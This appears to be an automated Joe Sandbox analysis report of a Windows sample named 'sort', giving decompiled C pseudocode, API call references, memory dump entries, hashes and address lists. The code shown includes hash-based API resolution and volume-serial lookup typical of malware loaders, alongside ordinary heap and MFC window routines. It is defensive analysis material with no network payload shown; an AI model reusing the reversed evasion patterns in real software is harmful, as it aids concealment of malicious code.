                                            • Instruction Fuzzy Hash: 4701C475B192126BD314AAF9BC14BAB22E7AFC4291B04046DF445CB248EF708C015BD2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E02275490(void* __ebx, void* __ebp) {
                                            				char _v520;
                                            				short _v528;
                                            				long _v532;
                                            				intOrPtr* _t7;
                                            				short* _t10;
                                            				WCHAR** _t28;
                                            
                                            				_t27 = __ebp;
                                            				_t16 = __ebx;
                                            				_t7 =  *0x227e1b8;
                                            				 *_t28 = 0;
                                            				if(_t7 == 0) {
                                            					_t7 = E02273E80(__ebx, E02273F20(0xbb398380), 0x61bf6c0c, __ebp);
                                            					 *0x227e1b8 = _t7;
                                            				}
                                            				_push(0x104);
                                            				_push( &_v520);
                                            				if( *_t7() != 0) {
                                            					_t10 =  &_v528;
                                            					if(_v528 != 0) {
                                            						while( *_t10 != 0x5c) {
                                            							_t10 = _t10 + 2;
                                            							if( *_t10 != 0) {
                                            								continue;
                                            							} else {
                                            							}
                                            							goto L9;
                                            						}
                                            						 *((short*)(_t10 + 2)) = 0;
                                            					}
                                            					L9:
                                            					if( *0x227e23c == 0) {
                                            						 *0x227e23c = E02273E80(_t16, E02273F20(0xbb398380), 0x8837cb40, _t27);
                                            					}
                                            					GetVolumeInformationW( &_v528, 0, 0,  &_v532, 0, 0, 0, 0); // executed
                                            				}
                                            				return _v532;
                                            			}










                                            APIs
                                            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02275531
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InformationVolume
                                            • String ID:
                                            • API String ID: 2039140958-0
                                            • Opcode ID: 55fdc9d052731fc282da4a5a7549b93eabb3038366ce06122490072e4a1eb6ca
                                            • Instruction ID: 9f785f36f9858f834ea9992808b7799b5a73dbd8b4d162bafa2ea8797060c53d
                                            • Opcode Fuzzy Hash: 55fdc9d052731fc282da4a5a7549b93eabb3038366ce06122490072e4a1eb6ca
                                            • Instruction Fuzzy Hash: E311A970A68301ABE714DBE4D856B76B3E1BF80704F84445CF945CB1D4EBB4D954CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E02276F10(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
                                            				struct HINSTANCE__* _t6;
                                            				intOrPtr* _t7;
                                            				intOrPtr* _t9;
                                            				intOrPtr _t17;
                                            				signed int _t28;
                                            				void* _t29;
                                            				WCHAR* _t30;
                                            				void* _t31;
                                            
                                            				_t15 = __ebx;
                                            				_t28 = __edx;
                                            				_t30 = E022734C0(__ecx);
                                            				if( *0x227ddc4 == 0) {
                                            					 *0x227ddc4 = E02273E80(__ebx, E02273F20(0xbb398380), 0x9261db99, _t31);
                                            				}
                                            				_t6 = LoadLibraryW(_t30);
                                            				_t17 =  *0x227e2e8; // 0x4c3710
                                            				 *(_t17 + 0xc + _t28 * 4) = _t6;
                                            				_t7 =  *0x227dea8;
                                            				if(_t7 == 0) {
                                            					_t7 = E02273E80(_t15, E02273F20(0xbb398380), 0x97f883e, _t31);
                                            					 *0x227dea8 = _t7;
                                            				}
                                            				_t29 =  *_t7();
                                            				_t9 =  *0x227e1a0;
                                            				if(_t9 == 0) {
                                            					_t9 = E02273E80(_t15, E02273F20(0xbb398380), 0x26c3f343, _t31);
                                            					 *0x227e1a0 = _t9;
                                            				}
                                            				return  *_t9(_t29, 0, _t30);
                                            			}












                                            APIs
                                            • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,0227704F,022768DC), ref: 02276F40
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: af66ff68ff6703f581d0c46feb864e968d76eb93a4849651938e98228bfd1057
                                            • Instruction ID: e5d90bf04a594fc78671ca0c20808e4f4b0688da0a9d3558a837eace8f73ef2a
                                            • Opcode Fuzzy Hash: af66ff68ff6703f581d0c46feb864e968d76eb93a4849651938e98228bfd1057
                                            • Instruction Fuzzy Hash: 00012C75B1A201AB9714FAF5B85867B22E7AFC02947040CA9F006CB348EF349C115BE2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931652161.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2241000_sort.jbxd
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: 09f7b03f767fc6b5f5d37a16990802a561865b3b8342087b0e892af978a46395
                                            • Instruction ID: 9a224a3fd580898107edc29c4d892f0576f0d550ea0600f0b21849f83c48856d
                                            • Opcode Fuzzy Hash: 09f7b03f767fc6b5f5d37a16990802a561865b3b8342087b0e892af978a46395
                                            • Instruction Fuzzy Hash: 8FD05B74D50208FFD704EFD4E505B5CBBF4EB04301F104154E90457244E6706E14CF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00408198(void* __ecx, intOrPtr _a4) {
                                            				intOrPtr _v8;
                                            				signed int _t45;
                                            				intOrPtr _t48;
                                            				signed int _t49;
                                            				intOrPtr _t51;
                                            				intOrPtr _t52;
                                            				intOrPtr _t53;
                                            				signed int _t54;
                                            				intOrPtr* _t55;
                                            				signed int _t57;
                                            				intOrPtr _t60;
                                            				intOrPtr _t61;
                                            				intOrPtr _t62;
                                            				void* _t69;
                                            				void* _t70;
                                            				void* _t77;
                                            				signed int _t78;
                                            				intOrPtr _t81;
                                            
                                            				_t60 = _a4;
                                            				_t81 =  *((intOrPtr*)(_t60 + 0x10));
                                            				_t45 =  *(_t60 + 8);
                                            				_t57 = 0;
                                            				while(_t45 >= 0) {
                                            					_t45 = _t45 << 1;
                                            					_t57 = _t57 + 1;
                                            				}
                                            				_t69 = 0x3f;
                                            				_t48 = _t57 * 0x204 + _t81 + 0x144;
                                            				_v8 = _t48;
                                            				do {
                                            					 *((intOrPtr*)(_t48 + 8)) = _t48;
                                            					 *((intOrPtr*)(_t48 + 4)) = _t48;
                                            					_t48 = _t48 + 8;
                                            					_t69 = _t69 - 1;
                                            				} while (_t69 != 0);
                                            				_t77 = (_t57 << 0xf) +  *((intOrPtr*)(_t60 + 0xc));
                                            				_t49 = VirtualAlloc(_t77, 0x8000, 0x1000, 4); // executed
                                            				if(_t49 != 0) {
                                            					_t70 = _t77 + 0x7000;
                                            					if(_t77 <= _t70) {
                                            						_t55 = _t77 + 0x10;
                                            						do {
                                            							 *(_t55 - 8) =  *(_t55 - 8) | 0xffffffff;
                                            							 *(_t55 + 0xfec) =  *(_t55 + 0xfec) | 0xffffffff;
                                            							 *((intOrPtr*)(_t55 - 4)) = 0xff0;
                                            							 *_t55 = _t55 + 0xffc;
                                            							 *((intOrPtr*)(_t55 + 4)) = _t55 - 0x1004;
                                            							 *((intOrPtr*)(_t55 + 0xfe8)) = 0xff0;
                                            							_t55 = _t55 + 0x1000;
                                            						} while (_t55 - 0x10 <= _t70);
                                            					}
                                            					_t61 = _t77 + 0xc;
                                            					_t51 = _v8 + 0x1f8;
                                            					_t78 = 1;
                                            					 *((intOrPtr*)(_t51 + 4)) = _t61;
                                            					 *((intOrPtr*)(_t61 + 8)) = _t51;
                                            					_t62 = _t70 + 0xc;
                                            					 *((intOrPtr*)(_t51 + 8)) = _t62;
                                            					 *((intOrPtr*)(_t62 + 4)) = _t51;
                                            					 *(_t81 + 0x44 + _t57 * 4) =  *(_t81 + 0x44 + _t57 * 4) & 0x00000000;
                                            					 *(_t81 + 0xc4 + _t57 * 4) = _t78;
                                            					_t52 =  *((intOrPtr*)(_t81 + 0x43));
                                            					_t53 = _a4;
                                            					 *((char*)(_t81 + 0x43)) = _t52 + 1;
                                            					if(_t52 == 0) {
                                            						 *(_t53 + 4) =  *(_t53 + 4) | _t78;
                                            					}
                                            					 *(_t53 + 8) =  *(_t53 + 8) &  !(0x80000000 >> _t57);
                                            					_t54 = _t57;
                                            				} else {
                                            					_t54 = _t49 | 0xffffffff;
                                            				}
                                            				return _t54;
                                            			}






















                                            APIs
                                            • VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,?,?,00407EBE,000000E0,00000000,?,?,?,004063F8), ref: 004081E9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: c10341eec60ebe6bbb32a5452224be3c98b41b110d200c327e5e4d1bcbefa23c
                                            • Instruction ID: a951a9915c6437c0f42f98627e617b565139ecfdaa8fc563ef3f50a1ca92f44d
                                            • Opcode Fuzzy Hash: c10341eec60ebe6bbb32a5452224be3c98b41b110d200c327e5e4d1bcbefa23c
                                            • Instruction Fuzzy Hash: FC319A316006068FD314CF18C984BA5BBE0FF50364F2482BED5598B3E2DB74A906CB44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 73%
                                            			E00407333(signed int _a4, signed int _a8) {
                                            				void* _t8;
                                            				long _t11;
                                            				void* _t13;
                                            				long _t15;
                                            				void* _t17;
                                            				void* _t23;
                                            
                                            				_t15 = _a4 * _a8;
                                            				_t11 = _t15;
                                            				if(_t15 <= 0xffffffe0) {
                                            					if(_t15 == 0) {
                                            						_t15 = 1;
                                            					}
                                            					_t15 = _t15 + 0x0000000f & 0xfffffff0;
                                            				}
                                            				while(1) {
                                            					_t13 = 0;
                                            					if(_t15 > 0xffffffe0) {
                                            						goto L8;
                                            					}
                                            					_t23 = _t11 -  *0x436fa8; // 0x3f8
                                            					if(_t23 > 0) {
                                            						L7:
                                            						_t13 = HeapAlloc( *0x43b63c, 8, _t15);
                                            						if(_t13 != 0) {
                                            							L12:
                                            							return _t13;
                                            						}
                                            						goto L8;
                                            					}
                                            					E004079D4(9);
                                            					_push(_t11); // executed
                                            					_t8 = E00407DDE(); // executed
                                            					_t13 = _t8;
                                            					E00407A35(9);
                                            					_t17 = _t17 + 0xc;
                                            					if(_t13 != 0) {
                                            						E00406330(_t13, 0, _t11);
                                            						goto L12;
                                            					}
                                            					goto L7;
                                            					L8:
                                            					if( *0x439d64 == 0) {
                                            						goto L12;
                                            					}
                                            					if(E00407954(_t15) == 0) {
                                            						return 0;
                                            					}
                                            				}
                                            			}










                                            APIs
                                            • HeapAlloc.KERNEL32(00000008,?,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407388
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: AllocHeap
                                            • String ID:
                                            • API String ID: 4292702814-0
                                            • Opcode ID: d8ddc1c96428b364bc5c95c0131a8b9d5b49fa79595c9ac96bb98cb66cd96fa8
                                            • Instruction ID: 3f3aad503001cd6b8f63a7fd222fe274e9ba08c9a4469d1d6c832ccce610b396
                                            • Opcode Fuzzy Hash: d8ddc1c96428b364bc5c95c0131a8b9d5b49fa79595c9ac96bb98cb66cd96fa8
                                            • Instruction Fuzzy Hash: B901F522E086106AF62166296C42B6B22059B807A9F1A0137FE54772D2D6787C01E1EF
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualFree.KERNELBASE(?,?,?), ref: 0224182F
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931652161.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2241000_sort.jbxd
                                            Similarity
                                            • API ID: FreeVirtual
                                            • String ID:
                                            • API String ID: 1263568516-0
                                            • Opcode ID: 38dc218105373fd44773c0c130e0d4746c7c4daf83264b01d4a4c4a7fa72be85
                                            • Instruction ID: 64282340d9f3295d39147d2fd07414a40987247c4e94170d017205eebe5a0f09
                                            • Opcode Fuzzy Hash: 38dc218105373fd44773c0c130e0d4746c7c4daf83264b01d4a4c4a7fa72be85
                                            • Instruction Fuzzy Hash: A0C04C7A55420CAB8B04DFD8F884DAB37FDBB8C714B148548BA1D87200C630F9108BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            C-Code - Quality: 96%
                                            			E00410E05(signed int __ecx) {
                                            				signed int _t116;
                                            				signed int _t119;
                                            				signed int _t120;
                                            				struct HWND__* _t124;
                                            				signed int _t126;
                                            				intOrPtr _t127;
                                            				signed char _t141;
                                            				signed int _t145;
                                            				signed int _t149;
                                            				signed int _t150;
                                            				void* _t160;
                                            				intOrPtr* _t167;
                                            				signed int _t169;
                                            				signed int _t182;
                                            				signed int _t183;
                                            				signed int _t186;
                                            				signed int _t188;
                                            				signed int _t198;
                                            				void* _t200;
                                            				signed short _t208;
                                            				intOrPtr _t211;
                                            				void* _t215;
                                            				void* _t217;
                                            				void* _t218;
                                            				void* _t220;
                                            				void* _t221;
                                            
                                            				_t116 = E00406520(E0042AA5D, _t215);
                                            				_t218 = _t217 - 0x74;
                                            				_t167 =  *((intOrPtr*)(_t215 + 8));
                                            				_t208 =  *(_t167 + 4);
                                            				_t198 = __ecx;
                                            				 *(_t215 - 0x10) = __ecx;
                                            				 *(_t215 - 0x1c) = _t208;
                                            				if(_t208 == 0x200 || _t208 == 0xa0 || _t208 == 0x202 || _t208 == 0x205 || _t208 == 0x208) {
                                            					_t116 = GetKeyState(1);
                                            					if(_t116 < 0) {
                                            						L49:
                                            						_t208 =  *(_t215 - 0x1c);
                                            						goto L50;
                                            					}
                                            					_t116 = GetKeyState(2);
                                            					if(_t116 < 0) {
                                            						goto L49;
                                            					}
                                            					_t116 = GetKeyState(4);
                                            					if(_t116 < 0) {
                                            						goto L49;
                                            					} else {
                                            						_push( *_t167);
                                            						L9:
                                            						_t116 = E00413740(_t215);
                                            						if(_t116 != 0 && ( *(_t116 + 0x24) & 0x00000401) == 0) {
                                            							_push(GetParent( *(_t116 + 0x1c)));
                                            							goto L9;
                                            						}
                                            						__eflags = _t116 - _t198;
                                            						if(_t116 == _t198) {
                                            							_t211 = E00425C92(0x4397cc, E0042440D);
                                            							 *((intOrPtr*)(_t215 - 0x18)) = _t211;
                                            							_t169 =  *(_t211 + 0xcc);
                                            							_t119 = E00414D17(_t198);
                                            							__eflags = _t169;
                                            							 *(_t215 - 0x14) = _t119;
                                            							if(_t169 == 0) {
                                            								L19:
                                            								_t120 = E004131DD(0x58);
                                            								 *(_t215 - 0x1c) = _t120;
                                            								_t169 = 0;
                                            								__eflags = _t120;
                                            								 *(_t215 - 4) = 0;
                                            								if(__eflags != 0) {
                                            									_t169 = E00410AA2(_t120);
                                            								}
                                            								 *(_t215 - 4) =  *(_t215 - 4) | 0xffffffff;
                                            								_push(1);
                                            								_t116 = E00410AF7(_t169, __eflags,  *(_t215 - 0x14));
                                            								__eflags = _t116;
                                            								if(_t116 != 0) {
                                            									SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
                                            									_t198 =  *(_t215 - 0x10);
                                            									 *(_t211 + 0xcc) = _t169;
                                            									L25:
                                            									E00406330(_t215 - 0x54, 0, 0x2c);
                                            									_t124 =  *(_t198 + 0x1c);
                                            									_t220 = _t218 + 0xc;
                                            									 *(_t215 - 0x4c) = _t124;
                                            									 *(_t215 - 0x48) = _t124;
                                            									 *(_t215 - 0x54) = 0x28;
                                            									 *(_t215 - 0x50) = 1;
                                            									_t126 = SendMessageA( *(_t169 + 0x1c), 0x408, 0, _t215 - 0x54);
                                            									__eflags = _t126;
                                            									if(_t126 == 0) {
                                            										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
                                            									}
                                            									_t127 =  *((intOrPtr*)(_t215 + 8));
                                            									 *((intOrPtr*)(_t215 - 0x24)) =  *((intOrPtr*)(_t127 + 0x18));
                                            									 *(_t215 - 0x28) =  *(_t127 + 0x14);
                                            									ScreenToClient( *(_t198 + 0x1c), _t215 - 0x28);
                                            									E00406330(_t215 - 0x80, 0, 0x2c);
                                            									_t221 = _t220 + 0xc;
                                            									 *(_t215 - 0x80) = 0x28;
                                            									_t116 =  *((intOrPtr*)( *_t198 + 0x64))( *(_t215 - 0x28),  *((intOrPtr*)(_t215 - 0x24)), _t215 - 0x80);
                                            									 *(_t215 - 0x1c) = _t116;
                                            									asm("sbb ecx, ecx");
                                            									_t182 =  ~(_t116 + 1) & _t198;
                                            									__eflags =  *(_t211 + 0xd4) - _t116;
                                            									 *(_t215 - 0x14) = _t182;
                                            									if( *(_t211 + 0xd4) != _t116) {
                                            										L33:
                                            										__eflags = _t116 - 0xffffffff;
                                            										if(_t116 == 0xffffffff) {
                                            											SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
                                            											L42:
                                            											E00410D73(_t169,  *((intOrPtr*)(_t215 + 8)));
                                            											__eflags =  *(_t211 + 0xd8) - 0x28;
                                            											_t91 = _t211 + 0xd8; // 0xd8
                                            											_t200 = _t91;
                                            											if( *(_t211 + 0xd8) >= 0x28) {
                                            												SendMessageA( *(_t169 + 0x1c), 0x405, 0, _t200);
                                            											}
                                            											 *(_t211 + 0xd0) =  *(_t215 - 0x14);
                                            											 *(_t211 + 0xd4) =  *(_t215 - 0x1c);
                                            											_t183 = 0xb;
                                            											_t116 = memcpy(_t200, _t215 - 0x80, _t183 << 2);
                                            											goto L45;
                                            										}
                                            										_t186 = 0xb;
                                            										_t141 = memcpy(_t215 - 0x54, _t215 - 0x80, _t186 << 2);
                                            										_t221 = _t221 + 0xc;
                                            										_t188 =  *(_t215 - 0x10);
                                            										 *(_t215 - 0x50) = _t141;
                                            										__eflags =  *(_t188 + 0x24) & 0x00000400;
                                            										if(( *(_t188 + 0x24) & 0x00000400) != 0) {
                                            											_t150 = _t141 | 0x00000020;
                                            											__eflags = _t150;
                                            											 *(_t215 - 0x50) = _t150;
                                            										}
                                            										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
                                            										__eflags =  *(_t215 - 0x79) & 0x00000040;
                                            										if(( *(_t215 - 0x79) & 0x00000040) != 0) {
                                            											L38:
                                            											SendMessageA( *(_t169 + 0x1c), 0x401, 1, 0);
                                            											_t145 =  *(_t215 - 0x10);
                                            											__eflags =  *(_t145 + 0x24) & 0x00000400;
                                            											if(( *(_t145 + 0x24) & 0x00000400) != 0) {
                                            												SendMessageA( *(_t169 + 0x1c), 0x411, 1, _t215 - 0x54);
                                            											}
                                            											SetWindowPos( *(_t169 + 0x1c), 0, 0, 0, 0, 0, 0x213);
                                            											goto L41;
                                            										} else {
                                            											_t149 = E00414D5B( *(_t215 - 0x10));
                                            											__eflags = _t149;
                                            											if(_t149 == 0) {
                                            												L41:
                                            												_t211 =  *((intOrPtr*)(_t215 - 0x18));
                                            												goto L42;
                                            											}
                                            											goto L38;
                                            										}
                                            									} else {
                                            										__eflags =  *(_t211 + 0xd0) - _t182;
                                            										if( *(_t211 + 0xd0) != _t182) {
                                            											goto L33;
                                            										}
                                            										__eflags =  *(_t198 + 0x25) & 0x00000004;
                                            										if(( *(_t198 + 0x25) & 0x00000004) == 0) {
                                            											__eflags = _t116 - 0xffffffff;
                                            											if(_t116 != 0xffffffff) {
                                            												_t116 = E00410D73(_t169,  *((intOrPtr*)(_t215 + 8)));
                                            											}
                                            										} else {
                                            											GetCursorPos(_t215 - 0x20);
                                            											_t116 = SendMessageA( *(_t169 + 0x1c), 0x412, 0, ( *(_t215 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t215 - 0x20) & 0x0000ffff);
                                            										}
                                            										L45:
                                            										__eflags =  *((intOrPtr*)(_t215 - 0x5c)) - 0xffffffff;
                                            										if( *((intOrPtr*)(_t215 - 0x5c)) != 0xffffffff) {
                                            											__eflags =  *(_t215 - 0x60);
                                            											if( *(_t215 - 0x60) == 0) {
                                            												_t116 = E004062E0( *((intOrPtr*)(_t215 - 0x5c)));
                                            											}
                                            										}
                                            										goto L78;
                                            									}
                                            								} else {
                                            									__eflags = _t169;
                                            									if(_t169 != 0) {
                                            										_t116 =  *((intOrPtr*)( *_t169 + 4))(1);
                                            									}
                                            									goto L78;
                                            								}
                                            							}
                                            							_t160 = E00404FFE(_t169);
                                            							__eflags = _t160 -  *(_t215 - 0x14);
                                            							if(_t160 !=  *(_t215 - 0x14)) {
                                            								 *((intOrPtr*)( *_t169 + 0x58))();
                                            								 *((intOrPtr*)( *_t169 + 4))(1);
                                            								_t169 = 0;
                                            								__eflags = 0;
                                            								 *(_t211 + 0xcc) = 0;
                                            							}
                                            							__eflags = _t169;
                                            							if(_t169 != 0) {
                                            								goto L25;
                                            							} else {
                                            								goto L19;
                                            							}
                                            						} else {
                                            							__eflags = _t116;
                                            							if(_t116 == 0) {
                                            								_t116 = E00425C92(0x4397cc, E0042440D);
                                            								 *(_t116 + 0xd0) =  *(_t116 + 0xd0) & 0x00000000;
                                            								 *(_t116 + 0xd4) =  *(_t116 + 0xd4) | 0xffffffff;
                                            							}
                                            							goto L78;
                                            						}
                                            					}
                                            				} else {
                                            					L50:
                                            					__eflags =  *(_t198 + 0x24) & 0x00000401;
                                            					if(( *(_t198 + 0x24) & 0x00000401) == 0) {
                                            						L78:
                                            						 *[fs:0x0] =  *((intOrPtr*)(_t215 - 0xc));
                                            						return _t116;
                                            					}
                                            					_push( *_t167);
                                            					while(1) {
                                            						_t116 = E00413740(_t215);
                                            						__eflags = _t116;
                                            						if(_t116 == 0) {
                                            							break;
                                            						}
                                            						__eflags = _t116 - _t198;
                                            						if(_t116 == _t198) {
                                            							L57:
                                            							__eflags = _t208 - 0x100;
                                            							if(_t208 < 0x100) {
                                            								L59:
                                            								__eflags = _t208 - 0x104;
                                            								if(_t208 < 0x104) {
                                            									L62:
                                            									_t116 = 0;
                                            									__eflags = 0;
                                            									L63:
                                            									__eflags =  *(_t198 + 0x25) & 0x00000004;
                                            									if(( *(_t198 + 0x25) & 0x00000004) != 0) {
                                            										goto L78;
                                            									}
                                            									__eflags = _t116;
                                            									if(_t116 != 0) {
                                            										L77:
                                            										_t116 = E00414026(_t116);
                                            										goto L78;
                                            									}
                                            									__eflags = _t208 - 0x201;
                                            									if(_t208 == 0x201) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0x203;
                                            									if(_t208 == 0x203) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0x204;
                                            									if(_t208 == 0x204) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0x206;
                                            									if(_t208 == 0x206) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0x207;
                                            									if(_t208 == 0x207) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0x209;
                                            									if(_t208 == 0x209) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0xa1;
                                            									if(_t208 == 0xa1) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0xa3;
                                            									if(_t208 == 0xa3) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0xa4;
                                            									if(_t208 == 0xa4) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0xa6;
                                            									if(_t208 == 0xa6) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0xa7;
                                            									if(_t208 == 0xa7) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0xa9;
                                            									if(_t208 != 0xa9) {
                                            										goto L78;
                                            									}
                                            									goto L77;
                                            								}
                                            								__eflags = _t208 - 0x107;
                                            								if(_t208 > 0x107) {
                                            									goto L62;
                                            								}
                                            								L61:
                                            								_t116 = 1;
                                            								goto L63;
                                            							}
                                            							__eflags = _t208 - 0x108;
                                            							if(_t208 <= 0x108) {
                                            								goto L61;
                                            							}
                                            							goto L59;
                                            						}
                                            						__eflags =  *(_t116 + 0x24) & 0x00000401;
                                            						if(( *(_t116 + 0x24) & 0x00000401) != 0) {
                                            							break;
                                            						}
                                            						_push(GetParent( *(_t116 + 0x1c)));
                                            					}
                                            					__eflags = _t116 - _t198;
                                            					if(_t116 != _t198) {
                                            						goto L78;
                                            					}
                                            					goto L57;
                                            				}
                                            			}
                                            0x004110a2
                                            0x004110a5
                                            0x004110a7
                                            0x004110a7
                                            0x004110a9
                                            0x004110a9
                                            0x004110bb
                                            0x004110c1
                                            0x004110c5
                                            0x004110d3
                                            0x004110de
                                            0x004110e4
                                            0x004110e7
                                            0x004110ea
                                            0x004110fa
                                            0x004110fa
                                            0x0041110d
                                            0x00000000
                                            0x004110c7
                                            0x004110ca
                                            0x004110cf
                                            0x004110d1
                                            0x00411113
                                            0x00411113
                                            0x00000000
                                            0x00411113
                                            0x00000000
                                            0x004110d1
                                            0x00411029
                                            0x00411029
                                            0x0041102f
                                            0x00000000
                                            0x00000000
                                            0x00411031
                                            0x00411035
                                            0x00411064
                                            0x00411067
                                            0x00411071
                                            0x00411071
                                            0x00411037
                                            0x0041103b
                                            0x00411059
                                            0x00411059
                                            0x00411159
                                            0x00411159
                                            0x0041115d
                                            0x00411163
                                            0x00411167
                                            0x00411170
                                            0x00411175
                                            0x00411167
                                            0x00000000
                                            0x0041115d
                                            0x00410f4a
                                            0x00410f4a
                                            0x00410f4c
                                            0x00410f58
                                            0x00410f58
                                            0x00000000
                                            0x00410f4c
                                            0x00410f48
                                            0x00410ef3
                                            0x00410ef8
                                            0x00410efb
                                            0x00410f01
                                            0x00410f0a
                                            0x00410f0d
                                            0x00410f0d
                                            0x00410f0f
                                            0x00410f0f
                                            0x00410f15
                                            0x00410f17
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00410e9f
                                            0x00410e9f
                                            0x00410ea1
                                            0x00410eb1
                                            0x00410eb6
                                            0x00410ebd
                                            0x00410ebd
                                            0x00000000
                                            0x00410ea1
                                            0x00410e9d
                                            0x00411192
                                            0x00411192
                                            0x00411192
                                            0x00411198
                                            0x00411260
                                            0x00411266
                                            0x0041126e
                                            0x0041126e
                                            0x0041119e
                                            0x004111a0
                                            0x004111a0
                                            0x004111a5
                                            0x004111a7
                                            0x00000000
                                            0x00000000
                                            0x004111a9
                                            0x004111ab
                                            0x004111c9
                                            0x004111c9
                                            0x004111cf
                                            0x004111d9
                                            0x004111d9
                                            0x004111df
                                            0x004111ee
                                            0x004111ee
                                            0x004111ee
                                            0x004111f0
                                            0x004111f0
                                            0x004111f4
                                            0x00000000
                                            0x00000000
                                            0x004111f6
                                            0x004111f8
                                            0x0041125a
                                            0x0041125b
                                            0x00000000
                                            0x0041125b
                                            0x004111fa
                                            0x00411200
                                            0x00000000
                                            0x00000000
                                            0x00411202
                                            0x00411208
                                            0x00000000
                                            0x00000000
                                            0x0041120a
                                            0x00411210
                                            0x00000000
                                            0x00000000
                                            0x00411212
                                            0x00411218
                                            0x00000000
                                            0x00000000
                                            0x0041121a
                                            0x00411220
                                            0x00000000
                                            0x00000000
                                            0x00411222
                                            0x00411228
                                            0x00000000
                                            0x00000000
                                            0x0041122a
                                            0x00411230
                                            0x00000000
                                            0x00000000
                                            0x00411232
                                            0x00411238
                                            0x00000000
                                            0x00000000
                                            0x0041123a
                                            0x00411240
                                            0x00000000
                                            0x00000000
                                            0x00411242
                                            0x00411248
                                            0x00000000
                                            0x00000000
                                            0x0041124a
                                            0x00411250
                                            0x00000000
                                            0x00000000
                                            0x00411252
                                            0x00411258
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00411258
                                            0x004111e1
                                            0x004111e7
                                            0x00000000
                                            0x00000000
                                            0x004111e9
                                            0x004111eb
                                            0x00000000
                                            0x004111eb
                                            0x004111d1
